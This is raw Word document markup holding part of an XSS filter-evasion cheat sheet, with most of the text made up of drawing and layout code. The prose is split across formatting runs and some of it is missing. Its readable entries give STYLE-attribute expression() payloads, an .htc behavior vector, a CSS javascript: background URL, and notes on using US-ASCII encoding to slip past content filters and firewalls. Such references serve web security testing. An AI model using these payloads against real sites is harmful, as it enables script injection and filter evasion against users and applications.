                              <a:gd name="T6" fmla="*/ 0 w 6221"/>
                              <a:gd name="T7" fmla="*/ 161 h 183"/>
                              <a:gd name="T8" fmla="*/ 0 w 6221"/>
                              <a:gd name="T9" fmla="*/ 158 h 183"/>
                              <a:gd name="T10" fmla="*/ 0 w 6221"/>
                              <a:gd name="T11" fmla="*/ 21 h 183"/>
                              <a:gd name="T12" fmla="*/ 21 w 6221"/>
                              <a:gd name="T13" fmla="*/ 0 h 183"/>
                              <a:gd name="T14" fmla="*/ 6200 w 6221"/>
                              <a:gd name="T15" fmla="*/ 0 h 183"/>
                              <a:gd name="T16" fmla="*/ 6221 w 6221"/>
                              <a:gd name="T17" fmla="*/ 21 h 183"/>
                              <a:gd name="T18" fmla="*/ 6221 w 6221"/>
                              <a:gd name="T19" fmla="*/ 161 h 183"/>
                              <a:gd name="T20" fmla="*/ 6203 w 6221"/>
                              <a:gd name="T21" fmla="*/ 182 h 183"/>
                              <a:gd name="T22" fmla="*/ 6200 w 6221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6221" h="183">
                                <a:moveTo>
                                  <a:pt x="620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200" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6221" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6221" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6203" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="620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Text Box 77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2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type="text/css"&gt;BODY{background:url("&lt;javascript:alert&gt;('XSS')")}&lt;/STYLE&gt;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71" o:spid="_x0000_s1659" style="width:311.05pt;height:9.15pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="622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">
                <v:shape id="Freeform 773" o:spid="_x0000_s1660" style="position:absolute;width:6221;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="622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AtSMQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQYvCMBSE78L+h/AWvGlqD1a6RpGFioi4WMW9Ppq3&#10;bbF5KU3U+u/NguBxmJlvmPmyN424Uedqywom4wgEcWF1zaWC0zEbzUA4j6yxsUwKHuRgufgYzDHV&#10;9s4HuuW+FAHCLkUFlfdtKqUrKjLoxrYlDt6f7Qz6ILtS6g7vAW4aGUfRVBqsOSxU2NJ3RcUlvxoF&#10;v/skK2eZ2+3qy+on3sZnOkzXSg0/+9UXCE+9f4df7Y1WkCQT+D8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gLUjEAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m6200,182l21,182r-3,l,161r,-3l,21,21,,6200,r21,21l6221,161r-18,21l6200,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="6200,182;21,182;18,182;0,161;0,158;0,21;21,0;6200,0;6221,21;6221,161;6203,182;6200,182" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 772" o:spid="_x0000_s1661" type="#_x0000_t202" style="position:absolute;width:622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3bhsYA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE70L/w/IKvZlNPahN3YiUFgqCGNNDj6/Z&#10;Z7Ik+zbNbjX+e1cQehxm5htmtR5tJ040eONYwXOSgiCunDZcK/gqP6ZLED4ga+wck4ILeVjnD5MV&#10;ZtqduaDTIdQiQthnqKAJoc+k9FVDFn3ieuLoHd1gMUQ51FIPeI5w28lZms6lRcNxocGe3hqq2sOf&#10;VbD55uLd/O5+9sWxMGX5kvJ23ir19DhuXkEEGsN/+N7+1AoWixnczsQj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3bhs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type="text/css"&gt;BODY{background:url("&lt;javascript:alert&gt;('XSS')")}&lt;/STYLE&gt;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4"/>
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:spacing w:before="102"/>
        <w:ind w:left="154"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Anonymous</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>HTML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STYLE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Attribute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3" w:lineRule="auto"/>
        <w:ind w:left="154" w:right="347"/>
      </w:pPr>
      <w:r>
        <w:t>IE6.0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Netscape</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>8.1+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IE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>rendering</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>engine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>mode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>don't</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>really</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>care</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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HTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>tag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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build</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>exists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not,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long</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3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starts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angle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>bracket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letter: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0048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105410</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2291715" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="767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1715" cy="116205"/>
                          <a:chOff x="1614" y="166"/>
                          <a:chExt cx="3609" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="768" name="Freeform 770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3609" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 5202 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 3609"/>
                              <a:gd name="T2" fmla="+- 0 348 166"/>
                              <a:gd name="T3" fmla="*/ 348 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 3609"/>
                              <a:gd name="T6" fmla="+- 0 348 166"/>
                              <a:gd name="T7" fmla="*/ 348 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 3609"/>
                              <a:gd name="T10" fmla="+- 0 347 166"/>
                              <a:gd name="T11" fmla="*/ 347 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 3609"/>
                              <a:gd name="T14" fmla="+- 0 327 166"/>
                              <a:gd name="T15" fmla="*/ 327 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 3609"/>
                              <a:gd name="T18" fmla="+- 0 324 166"/>
                              <a:gd name="T19" fmla="*/ 324 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 3609"/>
                              <a:gd name="T22" fmla="+- 0 187 166"/>
                              <a:gd name="T23" fmla="*/ 187 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 3609"/>
                              <a:gd name="T26" fmla="+- 0 166 166"/>
                              <a:gd name="T27" fmla="*/ 166 h 183"/>
                              <a:gd name="T28" fmla="+- 0 5202 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 3609"/>
                              <a:gd name="T30" fmla="+- 0 166 166"/>
                              <a:gd name="T31" fmla="*/ 166 h 183"/>
                              <a:gd name="T32" fmla="+- 0 5223 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 3609"/>
                              <a:gd name="T34" fmla="+- 0 187 166"/>
                              <a:gd name="T35" fmla="*/ 187 h 183"/>
                              <a:gd name="T36" fmla="+- 0 5223 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 3609"/>
                              <a:gd name="T38" fmla="+- 0 327 166"/>
                              <a:gd name="T39" fmla="*/ 327 h 183"/>
                              <a:gd name="T40" fmla="+- 0 5205 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 3609"/>
                              <a:gd name="T42" fmla="+- 0 347 166"/>
                              <a:gd name="T43" fmla="*/ 347 h 183"/>
                              <a:gd name="T44" fmla="+- 0 5202 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 3609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609" h="183">
                                <a:moveTo>
                                  <a:pt x="358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588" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3609" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3609" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3591" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="358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Text Box 769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360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&lt;XSS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STYLE="xss:expression(alert('XSS'))"&gt;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8" o:spid="_x0000_s1662" style="position:absolute;margin-left:80.7pt;margin-top:8.3pt;width:180.45pt;height:9.15pt;z-index:-15616000;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,166" coordsize="360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">
                <v:shape id="Freeform 770" o:spid="_x0000_s1663" style="position:absolute;left:1614;top:165;width:3609;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="360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BjnMIA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPy4rCMBTdC/5DuIK7Ma0LHapRxAcMggurgu4uzbWt&#10;NjelyWidr58sBJeH857OW1OJBzWutKwgHkQgiDOrS84VHA+br28QziNrrCyTghc5mM+6nSkm2j55&#10;T4/U5yKEsEtQQeF9nUjpsoIMuoGtiQN3tY1BH2CTS93gM4SbSg6jaCQNlhwaCqxpWVB2T3+NgkvM&#10;t3X8tz3b1GxXu6penxaru1L9XruYgPDU+o/47f7RCsajsDacCUd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MGOcwgAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93&#10;bnJldi54bWxQSwUGAAAAAAQABAD1AAAAhwMAAAAA&#10;" path="m3588,182l21,182r-3,-1l,161r,-3l,21,21,,3588,r21,21l3609,161r-18,20l3588,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="3588,348;21,348;18,347;0,327;0,324;0,187;21,166;3588,166;3609,187;3609,327;3591,347;3588,348" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 769" o:spid="_x0000_s1664" type="#_x0000_t202" style="position:absolute;left:1614;top:165;width:360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DfKsUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74X+h+UJvdWNHtKauooUBaEgxnjw+Jp9&#10;JovZtzG7avz3XaHgcZiZb5jpvLeNuFLnjWMFo2ECgrh02nClYF+s3j9B+ICssXFMCu7kYT57fZli&#10;pt2Nc7ruQiUihH2GCuoQ2kxKX9Zk0Q9dSxy9o+sshii7SuoObxFuGzlOklRaNBwXamzpu6bytLtY&#10;BYsD50tz3vxu82NuimKS8E96Uupt0C++QATqwzP8315rBR/pBB5n4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cN8q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&lt;XSS</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="7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STYLE="xss:expression(alert('XSS'))"&gt;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Local</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>htc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>File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3" w:lineRule="auto"/>
        <w:ind w:left="154"/>
      </w:pP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little</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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cross</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>site</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>scripting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>vectors</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>because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uses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.htc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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same</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>server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XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>vector.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example</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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works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pulling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JavaScript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running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part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attribute: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0099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104775</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2029460" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="764" name="Group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9460" cy="116205"/>
                          <a:chOff x="1614" y="165"/>
                          <a:chExt cx="3196" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="765" name="Freeform 767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3196" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 4789 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 3196"/>
                              <a:gd name="T2" fmla="+- 0 347 165"/>
                              <a:gd name="T3" fmla="*/ 347 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 3196"/>
                              <a:gd name="T6" fmla="+- 0 347 165"/>
                              <a:gd name="T7" fmla="*/ 347 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 3196"/>
                              <a:gd name="T10" fmla="+- 0 347 165"/>
                              <a:gd name="T11" fmla="*/ 347 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 3196"/>
                              <a:gd name="T14" fmla="+- 0 326 165"/>
                              <a:gd name="T15" fmla="*/ 326 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 3196"/>
                              <a:gd name="T18" fmla="+- 0 323 165"/>
                              <a:gd name="T19" fmla="*/ 323 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 3196"/>
                              <a:gd name="T22" fmla="+- 0 186 165"/>
                              <a:gd name="T23" fmla="*/ 186 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 3196"/>
                              <a:gd name="T26" fmla="+- 0 165 165"/>
                              <a:gd name="T27" fmla="*/ 165 h 183"/>
                              <a:gd name="T28" fmla="+- 0 4789 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 3196"/>
                              <a:gd name="T30" fmla="+- 0 165 165"/>
                              <a:gd name="T31" fmla="*/ 165 h 183"/>
                              <a:gd name="T32" fmla="+- 0 4810 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 3196"/>
                              <a:gd name="T34" fmla="+- 0 186 165"/>
                              <a:gd name="T35" fmla="*/ 186 h 183"/>
                              <a:gd name="T36" fmla="+- 0 4810 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 3196"/>
                              <a:gd name="T38" fmla="+- 0 326 165"/>
                              <a:gd name="T39" fmla="*/ 326 h 183"/>
                              <a:gd name="T40" fmla="+- 0 4792 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 3196"/>
                              <a:gd name="T42" fmla="+- 0 347 165"/>
                              <a:gd name="T43" fmla="*/ 347 h 183"/>
                              <a:gd name="T44" fmla="+- 0 4789 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 3196"/>
                              <a:gd name="T46" fmla="+- 0 347 165"/>
                              <a:gd name="T47" fmla="*/ 34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196" h="183">
                                <a:moveTo>
                                  <a:pt x="317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175" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3196" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3196" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3178" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="317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Text Box 76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319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&lt;XSS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STYLE="behavior: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url(xss.htc);"&gt;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5" o:spid="_x0000_s1665" style="position:absolute;margin-left:80.7pt;margin-top:8.25pt;width:159.8pt;height:9.15pt;z-index:-15615488;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,165" coordsize="319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">
                <v:shape id="Freeform 767" o:spid="_x0000_s1666" style="position:absolute;left:1614;top:165;width:3196;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="319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h1WccA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74L/YXmCN7NRqbXRVTTFUigtaIVen9ln&#10;Esy+DdltjP31bqHQ4zAz3zDLdWcq0VLjSssKxlEMgjizuuRcwfFzN5qDcB5ZY2WZFNzIwXrV7y0x&#10;0fbKe2oPPhcBwi5BBYX3dSKlywoy6CJbEwfvbBuDPsgml7rBa4CbSk7ieCYNlhwWCqwpLSi7HL6N&#10;gq+3+bn90U/p0X5M3y+n2zZ9ftkrNRx0mwUIT53/D/+1X7WCx9kD/J4JR0C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24dVnHAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRy&#10;cy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACMAwAAAAA=&#10;" path="m3175,182l21,182r-3,l,161r,-3l,21,21,,3175,r21,21l3196,161r-18,21l3175,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="3175,347;21,347;18,347;0,326;0,323;0,186;21,165;3175,165;3196,186;3196,326;3178,347;3175,347" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 766" o:spid="_x0000_s1667" type="#_x0000_t202" style="position:absolute;left:1614;top:165;width:319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9LWMUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74X+h+UJvdWNPcQa3YgUC4VCMaaHHp/Z&#10;l2Qx+zZmt5r+e1coeBxm5htmtR5tJ840eONYwWyagCCunDbcKPgu359fQfiArLFzTAr+yMM6f3xY&#10;YabdhQs670MjIoR9hgraEPpMSl+1ZNFPXU8cvdoNFkOUQyP1gJcIt518SZJUWjQcF1rs6a2l6rj/&#10;tQo2P1xszenrsCvqwpTlIuHP9KjU02TcLEEEGsM9/N/+0ArmaQq3M/EI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70tY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&lt;XSS</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="4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STYLE="behavior:</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="4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url(xss.htc);"&gt;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rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:sectPr w:rsidR="00AC7743">
          <w:pgSz w:w="11920" w:h="16860"/>
          <w:pgMar w:top="1340" w:right="1440" w:bottom="280" w:left="1460" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
        <w:spacing w:before="91"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>US-ASCII</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>Encoding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28" w:lineRule="auto"/>
        <w:ind w:left="154" w:right="219"/>
      </w:pPr>
      <w:r>
        <w:t>US-ASCII</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>encoding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(found</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8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Kurt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Huwig).This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>uses</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>malformed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>ASCII</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>encoding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7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>bits</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>instead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8.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XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>may</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>bypass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>many</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>content</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>filters</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4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only</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>works</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="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host</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>transmits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US-ASCII</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>encoding,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="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yourself.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useful</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>against</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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firewall</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>cross</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>site</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>scripting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>evasion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>than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server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>side</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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evasion.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Apache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Tomcat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known</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2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transmits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US-ASCII</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>encoding.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:sz w:val="11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0150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114935</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1597660" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="761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7660" cy="116205"/>
                          <a:chOff x="1614" y="181"/>
                          <a:chExt cx="2516" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="762" name="Freeform 764"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="181"/>
